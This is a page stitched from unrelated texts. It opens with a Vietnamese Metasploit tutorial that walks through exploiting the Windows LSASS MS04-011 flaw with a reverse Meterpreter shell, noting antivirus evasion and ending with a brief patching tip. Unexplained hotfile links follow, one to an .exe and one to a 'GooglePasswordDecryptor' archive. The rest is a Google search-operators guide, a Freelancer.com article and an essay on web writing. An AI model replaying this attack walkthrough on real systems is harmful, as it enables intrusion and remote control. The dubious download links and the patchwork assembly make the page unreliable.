Metasploit Framework là một môi trường dùng để kiểm tra ,tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python.Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Bạn có thể download chương trình tại www.metasploit.com

Metasploit có thể tự động update bắt đầu từ version 2.2 trở đi, sử dụng script msfupdate.bat trong thư mục cài đặt

2)Các thành phần của Metasploit

Metasploit hỗ trợ nhiều giao diện với người dùng:

-console interface: dùng msfconsole.bat. Msfconsole interface sử dụng các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn

-Web interface: dùng msfweb.bat, giao tiếp với người dùng thông qua giao diện web

-Command line interface: dùng msfcli.bat

Enviroment

Global Enviroment:được thực thi thông qua 2 câu lệnh setg và unsetg, những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits

Temporary Enviroment: được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng đến các module exploit khác

Bạn có thể lưu lại enviroment mình đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu trong /.msf/config và sẽ được load trở lại khi user interface được thực hiện

Những options nào mà chung giữa các exploits module như là: LPORT, LHOST, PAYLOAD thì bạn nên được xác định ở Global Enviroment

vd: msf> setg LPORT 80

msf> setg LHOST 172.16.8.2

3)Sử dụng Metasploit framework

1. Chọn module exploit: lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác

show exploits: xem các module exploit mà framework có hỗ trợ

use exploit_name: chọn module exploit

info exploit_name: xem thông tin về module exploit

Bạn nên cập nhật thường xuyên các lỗi dịch vụ trên www.metasploit.com hoặc qua script msfupdate.bat

2. Cấu hình module exploit đã chọn

show options: Xác định những options nào cần cấu hình

set : cấu hình cho những option của module đó

Một vài module còn có những advanced options, bạn có thể xem bằng cách gõ dòng lệnh show advanceds

3. Verify những options vừa cấu hình:

check: kiểm tra xem những option đã được set chính xác chưa.

4. Lựa chọn target: lựa chọn hệ diều hành nào để thực hiện

show targets: những target được cung cấp bởi module đó

set: xác định target nào

vd: smf> use windows_ssl_pct

show targets

exploit sẽ liệt kê ra những target như: winxp, winxp SP1, win2000, win2000 SP1

5. Lựa chọn payload

payload là đoạn code mà sẽ chạy trên hệ thống remote machine

show payloads: liệt kê ra những payload của module exploit hiện tại

info payload_name: xem thông tin chi tiết về payload đó

set PAYLOAD payload_name: xác định payload module name.Sau khi lựa chọn payload nào, dùng lệnh show options để xem những options của payload đó

show advanced: xem những advanced options của payload đó

6.Thực thi exploit

exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho bạn những thông tin về hệ thống được khai thác

4.Giới thiệu payload meterpreter

Meterpreter, viết tắt từ Meta-Interpreter là một advanced payload có trong Metasploit framework. Muc đích của nó là để cung cấp những tập lệnh để khai thác, tấn câng các máy remote computers. Nó được viết từ các developers dưới dạng shared object( DLL) files. Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus

Meterpreter cung cấp một tập lệnh để chúng ta có thể khai thác trên các remote computers

Fs: cho phép upload và download files từ các remote machine

Net: cho phép xem thông tin mạng của remote machine như IP, route table

Process:cho phép tạo các processes mới trên remote machine

Sys: cho phép xem thông tin hệ thống của remote machine

Sử dụng câu lệnh

use -m module1,module2,module3 [ -p path ] [ -d ]

Câu lệnh use dùng để load những module mở rộng của meterpreter như: Fs, Net, Process..

loadlib -f library [ -t target ] [ -lde ]

Câu lệnh cho phép load các thư viện của remote machines

read channel_id [length]

Lệnh read cho phép xem dữ liêu của remote machine trên channel đang kết nối

write channel_id

Lệnh write cho phép ghi dữ liệu lên remote machine

close channel_id

Đóng channel mà đã kết nối với remote computer

interact channel_id

Bắt đầu một phiên làm việc với channel vừa thiết lập với remote machine

initcrypt cipher [parameters]

Mã hoá dữ liệu được gửi giữa host và remote machine

Sử dụng module Fs: cho phép upload và download files từ các remote machine

cd directory

giống lệnh cd của commandline

getcwd

cho biết thư mục đang làm việc hiện tại

ls [filter_string]

liệt kê các thư mục và tập tin

upload src1 [src2 ...] dst

upload file

download src1 [src2 ...] dst

download file

Sử dụng module Net:

ipconfig

route

xem bảng định tuyến của remote machine

portfwd [ -arv ] [ -L laddr ] [ -l lport ] [ -h rhost ] [ -p rport ] [ -P ]

cho phép tạo port forward giữa host và remote machine

Sử dụng module Process:

execute -f file [ -a args ] [ -Hc ]

câu lệnh execute cho phép bạn tạo ra một process mới trên remote machine và sử dụng process đó để khai thác dữ liệu

kill pid1 pid2 pid3

huỷ những processes đang chạy trên máy remote machine

ps

liệt kê những process của remote machine

Sử dụng module Sys:

getuid

cho biết username hiện tại của remote machine

sysinfo

cho biết thông tin về computername, OS

5)Ví dụ:

Máy localhost có địa chỉ 192.168.1.1 sẽ tấn công máy remote có địa chỉ 192.168.1.2 thông qua lỗi Lsass_ms04_011. Đây là lỗi tràn stack trong dịch vụ LSA( Local Security Authority).Lsass.exe là một process của hệ thống Microsoft Windows, chịu trách nhiệm về chứng thực local security, quản lý Active Directory và các chính sách login. Lsass kiểm sóat việc chứng thực của cả client và server.

Msf>use Lsass_ms04_011

Msf>set PAYLOAD win32_reverse_meterpreter

Msf>set RHOST 192.168.1.2

Msf>set LHOST 192.168.1.1

Msf>exploit

Meterpreter> help

Meterpreter>use -m Process //add thêm tập lệnh của process

Meterpreter>help // xem các lệnh meterpreter hỗ trợ

Meterpreter>ps // list các process mà remote machine đang chạy

Meterpreter>kill // tắt các process mà remote machine đang chạy

Meterpreter> execute -f cmd –c // tấn công sử dụng comandline cmd của remote machine

execute: success, process id is 3516.

execute: allocated channel 1 for new process.

meterpreter> interact 1

interact: Switching to interactive console on 1…

interact: Started interactive channel 1.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS>echo Meterpreter interactive channel in action

echo Meterpreter interactive channel in action

Meterpreter interactive channel in action

C:\WINDOWS>ipconfig

Caught Ctrl-C, close interactive session? [y/N] y

meterpreter>

6)Cách phòng chống

Thường xuyên cập nhật các bản vá lỗi của Microsofts. Ví dụ như để Metasploit không thể khai thác được lỗi Lsass_ms04_011, bạn phải cập nhật bản vá lỗi của Microsoft. Theo Microsoft đánh giá, đây là một lỗi nghiêm trọng, có trên hầu hết tất cả các hệ điều hành windows. Bạn nên sử dụng hotfix có number là 835732 để vá lỗi trên.

http://hotfile.com/dl/122156544/ca4a509/ducsetup.exe.html

http://hotfile.com/dl/122155225/52e1960/queryapp.zip.html

http://hotfile.com/dl/122154468/929c8bf/GooglePasswordDecryptor.zip.html

The following is an alphabetical list of the search operators. This list includes operators that are not officially supported by Google and not listed in Google’s online help.

Note: Google may change how undocumented operators work or may eliminate them completely.

Each entry typically includes the syntax, the capabilities, and an example. Some of the search operators won’t work as intended if you put a space between the colon (:) and the subsequent query word. If you don’t care to check which search operators require no space after the colon, always place the keyword immediately next to the colon. Many search operators can appear anywhere in your query. In our examples, we place the search operator as far to the right as possible. We do this because the Advanced Search form writes queries in this way. Also, such a convention makes it clearer as to which operators are associated with which terms.

allinanchor:

If you start your query with allinanchor:, Google restricts results to pages containing all query terms you specify in the anchor text on links to the page. For example, [ allinanchor: best museums sydney ] will return only pages in which the anchor text on links to the pages contain the words “best,” “museums,” and “sydney.”

Anchor text is the text on a page that is linked to another web page or a different place on the current page. When you click on anchor text, you will be taken to the page or place on the page to which it is linked. When using allinanchor: in your query, do not include any other search operators. The functionality of allinanchor: is also available through the Advanced Web Search page, under Occurrences.
allintext:

If you start your query with allintext:, Google restricts results to those containing all the query terms you specify in the text of the page. For example, [ allintext: travel packing list ] will return only pages in which the words “travel,” “packing,” and “list” appear in the text of the page. This functionality can also be obtained through the Advanced Web Search page, under Occurrences.
allintitle:

If you start your query with allintitle:, Google restricts results to those containing all the query terms you specify in the title. For example, [ allintitle: detect plagiarism ] will return only documents that contain the words “detect” and “plagiarism” in the title. This functionality can also be obtained through the Advanced Web Search page, under Occurrences.

The title of a webpage is usually displayed at the top of the browser window and in the first line of Google’s search results for a page. The author of a website specifies the title of a page with the HTML TITLE element. There’s only one title in a webpage. When using allintitle: in your query, do not include any other search operators. The functionality of allintitle: is also available through the Advanced Web Search page, under Occurrences.

In Image Search, the operator allintitle: will return images in files whose names contain the terms that you specify.

In Google News, the operator allintitle: will return articles whose titles include the terms you specify.
allinurl:

If you start your query with allinurl:, Google restricts results to those containing all the query terms you specify in the URL. For example, [ allinurl: google faq ] will return only documents that contain the words “google” and “faq” in the URL, such as “www.google.com/help/faq.html”. This functionality can also be obtained through the Advanced Web Search page, under Occurrences.

In URLs, words are often run together. They need not be run together when you’re using allinurl:.

In Google News, the operator allinurl: will return articles whose titles include the terms you specify.

The Uniform Resource Locator, more commonly known as URL, is the address that specifies the location of a file on the Internet. When using allinurl: in your query, do not include any other search operators. The functionality of allinurl: is also available through the Advanced Web Search page, under Occurrences.
author:

If you include author: in your query, Google will restrict your Google Groups results to include newsgroup articles by the author you specify. The author can be a full or partial name or email address. For example, [ children author:john author:doe ] or [ children author:doe@someaddress.com ] return articles that contain the word “children” written by John Doe or doe@someaddress.com.

Google will search for exactly what you specify. If your query contains [ author:”John Doe” ] (with quotes), Google won’t find articles where the author is specified as “Doe, John.”
cache:

The query cache:url will display Google’s cached version of a web page, instead of the current version of the page. For example, [ cache:www.eff.org ] will show Google’s cached version of the Electronic Frontier Foundation home page.

Note: Do not put a space between cache: and the URL (web address).

On the cached version of a page, Google will highlight terms in your query that appear after the cache: search operator. For example, [ cache:www.pandemonia.com/flying/ fly diary ] will show Google’s cached version of Flight Diary in which Hamish Reid’s documents what’s involved in learning how to fly with the terms “fly” and “diary” highlighted.
define:

If you start your query with define:, Google shows definitions from pages on the web for the term that follows. This advanced search operator is useful for finding definitions of words, phrases, and acronyms. For example, [ define: blog ] will show definitions for “Blog” (weB LOG).
ext:

This is an undocumented alias for filetype:.
filetype:

If you include filetype:suffix in your query, Google will restrict the results to pages whose names end in suffix. For example, [ web page evaluation checklist filetype:pdf ] will return Adobe Acrobat pdf files that match the terms “web,” “page,” “evaluation,” and “checklist.” You can restrict the results to pages whose names end with pdf and doc by using the OR operator, e.g. [ email security filetype:pdf OR filetype:doc ].

When you don’t specify a File Format in the Advanced Search Form or the filetype: operator, Google searches a variety of file formats; see the table in File Type Conversion.
group:

If you include group: in your query, Google will restrict your Google Groups results to newsgroup articles from certain groups or subareas. For example, [ sleep group:misc.kids.moderated ] will return articles in the group misc.kids.moderated that contain the word “sleep” and [ sleep group:misc.kids ] will return articles in the subarea misc.kids that contain the word “sleep.”
id:

This is an undocumented alias for info:.
inanchor:

If you include inanchor: in your query, Google will restrict the results to pages containing the query terms you specify in the anchor text or links to the page. For example, [ restaurants inanchor:gourmet ] will return pages in which the anchor text on links to the pages contain the word “gourmet” and the page contains the word “restaurants.”
info:

The query info:URL will present some information about the corresponding web page. For instance, [ info:gothotel.com ] will show information about the national hotel directory GotHotel.com home page.

Note: There must be no space between the info: and the web page URL.

This functionality can also be obtained by typing the web page URL directly into a Google search box.
insubject:

If you include insubject: in your query, Google will restrict articles in Google Groups to those that contain the terms you specify in the subject. For example, [ insubject:”falling asleep” ] will return Google Group articles that contain the phrase “falling asleep” in the subject.

Equivalent to intitle:.
intext:

The query intext:term restricts results to documents containing term in the text. For instance, [ Hamish Reid intext:pandemonia ] will return documents that mention the word “pandemonia” in the text, and mention the names “Hamish” and “Reid” anywhere in the document (text or not).

Note: There must be no space between the intext: and the following word.

Putting intext: in front of every word in your query is equivalent to putting allintext: at the front of your query, e.g., [ intext:handsome intext:poets ] is the same as [ allintext: handsome poets ].
intitle:

The query intitle:term restricts results to documents containing term in the title. For instance, [ flu shot intitle:help ] will return documents that mention the word “help” in their titles, and mention the words “flu” and “shot” anywhere in the document (title or not).

Note: There must be no space between the intitle: and the following word.

Putting intitle: in front of every word in your query is equivalent to putting allintitle: at the front of your query, e.g., [ intitle:google intitle:search ] is the same as [ allintitle: google search ].
inurl:

If you include inurl: in your query, Google will restrict the results to documents containing that word in the URL. For instance, [ inurl:print site:www.googleguide.com ] searches for pages on Google Guide in which the URL contains the word “print.” It finds pdf files that are in the directory or folder named “print” on the Google Guide website. The query [ inurl:healthy eating ] will return documents that mention the words “healthy” in their URL, and mention the word “eating” anywhere in the document.

Note: There must be no space between the inurl: and the following word.

Putting inurl: in front of every word in your query is equivalent to putting allinurl: at the front of your query, e.g., [ inurl:healthy inurl:eating ] is the same as [ allinurl: healthy eating ].

In URLs, words are often run together. They need not be run together when you’re using inurl:.
link:

The query link:URL shows pages that point to that URL. For example, to find pages that point to Google Guide’s home page, enter:

[ link:www.googleguide.com ]

Note: According to Google’s documentation, “you cannot combine a link: search with a regular keyword search.”

Also note that when you combine link: with another advanced operator, Google may not return all the pages that match. The following queries should return lots of results, as you can see if you remove the -site: term in each of these queries.

Find links to the Google home page not on Google’s own site.

[ link:www.google.com -site:google.com ]

Find links to the UK Owners Direct home page not on its own site.

[ link:www.www.ownersdirect.co.uk -site:ownersdirect.co.uk ]
location:

If you include location: in your query on Google News, only articles from the location you specify will be returned. For example, [ queen location:canada ] will show articles that match the term “queen” from sites in Canada. Many other country names work; try them and see.

Two-letter US state abbreviations match individual US states, and two-letter Canadian province abbreviations (like NS for Nova Scotia) also work — although some provinces don’t have many newspapers online, so you may not get many results. Some other two-letter abbreviations — such as UK for the United Kingdom — are also available.
movie:

If you include movie: in your query, Google will find movie-related information. For examples, see Google’s Blog.
phonebook:

If you start your query with phonebook:, Google shows all public U.S. resudence telephone listings (name, address, phone number) for the person you specify. For example, [ phonebook: John Doe New York NY ] will show phonebook listings of everyone named John Doe in New York, NY.
related:

The query related:URL will list web pages that are similar to the web page you specify. For instance, [ related:www.consumerreports.org ] will list web pages that are similar to the Consumer Reports home page.

Note: Don’t include a space between the related: and the web page url.

You can also find similar pages from the “Similar pages” link on Google’s main results page, and from the similar selector in the Page-Specific Search area of the Advanced Search page. If you expect to search frequently for similar pages, consider installing a GoogleScout browser button, which scouts for similar pages.
site:

If you include site: in your query, Google will restrict your search results to the site or domain you specify. For example, [ admissions site:www.lse.ac.uk ] will show admissions information from London School of Economics’ site and [ peace site:gov ] will find pages about peace within the .gov domain. You can specify a domain with or without a period, e.g., either as .gov or gov.

Note: Do not include a space between the “site:” and the domain.

You can use many of the search operators in conjunction with the basic search operators +, –, OR, and ” “. For example, to find information on Windows security from all sites except microsoft.com, enter:

[ windows security –site:microsoft.com ]

You can also restrict your results to a site or domain through the domains selector on the Advanced Search page.
source:

If you include source: in your query, Google News will restrict your search to articles from the news source with the ID you specify. For example, [ election source:new_york_times ] will return articles with the word “election” that appear in the New York Times.

To find a news source ID, enter a query that includes a term and the name of the publication you’re seeking. You can also specify the publication name in the “news source” field in the Advanced News Search form. You’ll find the news source ID in the query box, following the source: search operator. For example, let’s say you enter the publication name Ha’aretz in the News Source box, then you click the Google Search button. The results page appears, and its search box contains [ peace source:ha_aretz__subscription_ ]. This means that the news source ID is ha_aretz__subscription_. This query will only return articles that include the word “peace” from the Israeli newspaper Ha’aretz.
weather

If you enter a query with the word weather and a city or location name, if Google recognizes the location, the forecast will appear at the top of the results page. Otherwise, your results will usually include links to sites with the weather conditions and forecast for that location.

Since weather is not an advanced operator, there is no need to include a colon after the word. For example, [ weather Sunnyvale CA ] will return the weather for Sunnyvale, California and [ weather 94041 ] will return the weather for the city containing the zip code (US postal code) 94041, which is Mountain View, California.

The Google Guide Advanced Operator Quick Reference (www.googleguide.com/advanced_operators_reference.html) provides a nice summary of the search operators grouped by type. It includes search operators not yet documented by Google, e.g., allinanchor:, allintext:, author:, ext:, group:, id:, insubject:, intext:, intitle:, location:, phonebook:, and source:.

Note: Google may change how undocumented operators work or eliminate them completely. If you notice problems or changes in Google’s undocumented operators, please let us know.

Exercises

This problem set is designed to give you experiences with search operators and practice with specifying more precisely what you’re seeking by using the Advanced Search form. For hints and answers to selected problems, see the Solutions page.

1. Use the site: operator to search for armchairs on IKEA’s site, www.ikea.com.
2. Use the Advanced Search form to find the page whose title is “Some Ways to Detect Plagiarism.” When the title is entered in lowercase letters, the query box on the results page contains [allintitle: “ways to detect plagiarism” ].
3. Find all pages on google.com but not on answers.google.com nor on directory.google.com whose titles include the words “FAQ” or “help.”
4. Use the link: operator to see who links to googleguide.com, your company’s website, or your favorite website.
5. Find pages whose titles include surfing that are not about surfing the World Wide Web.
6. Find out where the upcoming international conference on AIDS is being held.
7. How can you search for [ google help ] on Google Guide, www.googleguide.com, and on the UC Berkeley library website, www.lib.berkeley.edu?

Freelancer.com is a website that provides an online job marketplace for freelance workers from around the world. Formerly known as GetAFreelancer.com, the company was founded in 2004 by Plendo Sweden, headed up by Magnus Tibell of Swedish web solutions company Innovate It[1]. GetAFreelancer.com was bought on the 7th May 2009[1] by the Australian company Ignition Networks[2]. The buyers changed the name to Freelancer.com in October 2009[3].

How Freelancer works

Users of Freelancer.com fall into two main categories: buyers and providers.
Buyers

Buyers are individuals or companies who wish to outsource their work. There may be several reasons for this: perhaps the job to be done is too small to warrant employing a full time member of staff, or it requires specialist knowledge or skill not pre-existing within the organisation. A significant draw is the opportunity to exploit global competition and have a project completed much more cheaply than it could be done at home[4]. The way that Freelancer.com works has been likened to eBay, but for jobs[5]. Buyers must register and set up a profile on Freelancer.com. There are 2 options available, either the “basic” free membership, or a “Gold” premium membership. With the basic membership, there are no monthly fees to pay, but the buyer must pay $3 or 3% of the total project fee (whichever is the greater) of each project they post to Freelancer.com. In addition, a $5 fee is taken when the project is posted, refundable upon selection of a provider. This deposit is to discourage the increasing number of “spam” buyers who post projects to garner interest from providers, then cancel the project and continue to operate it outside of Freelancer’s terms and conditions[4],[6]. The buyer is able to specify the budget range for the project with the brackets being $30 – 250 USD, $250 – 750 USD, $750 – 1500 USD, $1500 – 3000 USD, $3000 – 5000 USD, or >$5000 USD. Based on this and the project description, the interested provider makes a bid, which is then forwarded to the buyer. The buyer is then able to review all the bids he or she receives and judge for themselves who they would like to select to complete the project[4].
Providers

Providers, or “freelancers”, are individuals or teams who wish to be hired for outsourced work. Individuals may be full or part time self-employed persons, or those who wish to make some extra money on an ad hoc basis. Some providers on Freelancer.com are in fact teams or agencies who bid for work to delegate out to one of their members[7]. Like buyers, providers also have a choice of either a basic account or a Gold membership. With a basic membership, providers pay no monthly fees but are charged $5 USD or 10% of the project fee when they are selected, whichever is the greater. Paying $24.95 USD per month for a Gold membership reduces the project commission fee to 3% and allows a provider to make up to 150 bids per month, instead of 30 as a basic member[6].
Completing a project

Once a buyer has selected a provider, they are each provided with the other’s contact details so that they are able to communicate freely with one another. It is up to the buyer and freelancer to mutually agree a timeframe for project completion and payment schedule. Payment may be made by transferring funds from the buyer’s Freelancer account to the provider’s, or may be conducted externally to Freelancer via PayPal, Moneybookers or another method of the buyer and provider’s choice. Payment outside of Freelancer’s system removes the ability for both buyer and provider to leave feedback for the other party[8].
FreelancerAPI

In April 2010, Freelancer.com announced the release of FreelancerAPI, an application programming interface that allows software to task humans with work to be done, rather than the traditional API which allows humans to program computers via software.[9].
Financing

Freelancer.com has been 100% bootstrapped to date. Startive Capital, a boutique venture capital fund and startup incubator based in Sydney, Australia, provided the financing for the acquisition of Freelancer.com by Ignition.[10],[11].

By Amrit Hallan

Among the web’s myriad peculiarities, one is, the way people read online text. It took me a lot of time (being a writer who loves to read the greats like Dickens and Kafka) to realize how impatient and hurried the general web reader is.

Most web readers do not read complete sentences and paragraphs, unless they are reading a white paper or a piece of literature. They generally scan the headlines, or the words and expressions that grab their attention. Web readers tend to scan text online and read text offline. They typically do not read a page from start to finish on the computer screen. Instead, they scan a site looking for relevant items and then print pages that contain the information they seek. You need to apply a style and method to your Web documents that accommodate this type of reading.

I’m not saying there are hard and fast rules for writing for the online audience, but if you take care of the following guidelines, you may find yourself on the comfortable side of the hedge.
TRY TO BE CONCISE

As I mentioned above, an average web reader doesn’t read big text streams. Unlike a printed papyrus, the web is humanly limitless when it comes to seeking information. It’s all on the back of the reader’s mind that the moment he or she begins to feel bored, just a few clicks are required to go somewhere else.
CONVERSE WITH YOUR READER

Write in a conversational tone whenever possible. Use lots of You’s, I’s and Me’s. Keep a free flow and keep throwing appealing and stimulating expressions at your reader. No, it doesn’t mean you create a nuisance or insult the sensibilities of your reader, but try to be as formal as your subject allows.

A few months back I used to write technical tutorials for a management portal. The chief editor had hired me as a freelance columnist because of my casual but incisive style. The senior management, however, objected to my style and suggested that I should tone down my humor and make the tutorials sound serious and bookish. While I wrote in my style, the portal got great response and the readers loved the tutorials. When they curbed my style, the popularity declined vertically, and soon, I got bored and stopped writing for them. They closed the web site last week because many subscribers asked them to refund the subscription money.

Lesson learnt: no matter what’s the field, a typical web reader does not read pedantic stuff. I don’t know why, but the web makes them funky.
WRITE IN A LINEAR FASHION

Try not to divide a single topic among various pages. If the message is interesting and relevant, your web readers would like to read it on a single page no matter how long and bulky that page is. They don’t appreciate pressing the Backward and Forward buttons.

I have seen this myself, and know how irritating it is to having to go to various pages to read just one article or product description. Fine, the web readers prefer shorter pages, but it doesn’t mean if a paper consists of thousand pages then we should have to click thousand pages to read that paper. It’s better if all the content is on a single, linear, scrollable page.
USE LESSER LINKS

Some online articles are full of links. Even for a two-line explanation, some writers use a second page and give the hyper link in the first page. I find it very restrictive, especially if I want to take a printout for later reading. Agreed, sometimes we can’t help it, but keep in mind that where you can avoid giving a link, avoid it.

Another problem with links is, they distract the reader. Sometimes the reader goes to the link, reads whatever is there, and ends up forgetting the original page.
HIGHLIGHT MAIN POINTS IN THE BEGINNING

Yes, this is a very important point. If you give the headlines at the beginning of the page, and if you make them interesting, the web readers tend to read with greater earnestness.

Suppose an article or a section tells the insomniacs how they can sleep using the technique mentioned in the article or the section. The following highlight would probably trigger an interest:

DO YOU CRAVE TO SLEEP CONTINUOUSLY FOR AT LEAST 10 HOURS WITHOUT TAKING A PILL? READ ON TO KNOW HOW YOU CAN.
MAKE COMPLETE PAGES

As far as possible, all relevant pages should be self-reliant, and should be present in their intrinsic entirety. Web surfers arrive at web pages randomly, sometimes directly from a search engine or a referred link. There is no way to tell where they’ve been or where they’ll go after visiting your page. Even if you try to provide content using links to bind related pages together, you cannot force a Web reader to follow those links. As a result, your approach must be encyclopedic, giving the reader a fairly comprehensive presentation of the topic on every page. Whenever they arrive, they should know where they are without having to go here and there.

Always include a link that takes to the main section of the web site with just one click.
IMPORTANT THINGS FIRST

The important message that is to be communicated to your visitor, according to the relevance, should come first on the page, and if aesthetically possible, properly highlighted. Think of all those things that the visitor should/would like to see first most, and keep them as easily accessible as possible.

You should present the important information in the first two or three paragraphs so that by the time the reader gets distracted and leaves the site, you have conveyed your main message.
MAKE PRINTABLE PAGES

If you have lots of textual content on your web site, keep it in a form so that your readers can take out printouts. Either create separate copies of your web pages stripped off all the layout features, or use a ready-made script (you can get many such scripts on the Internet) that removes all the HTML tags before showing your web page.

This sums-up my writing presentation for the time being. If you feel I have left out some vital point, you are welcome to let me know.

Copyright © 2010 Amrit Hallan
If you want to publish this article, please let me know.

http://amrithallan.com/how-to-write-for-the-web/

]]>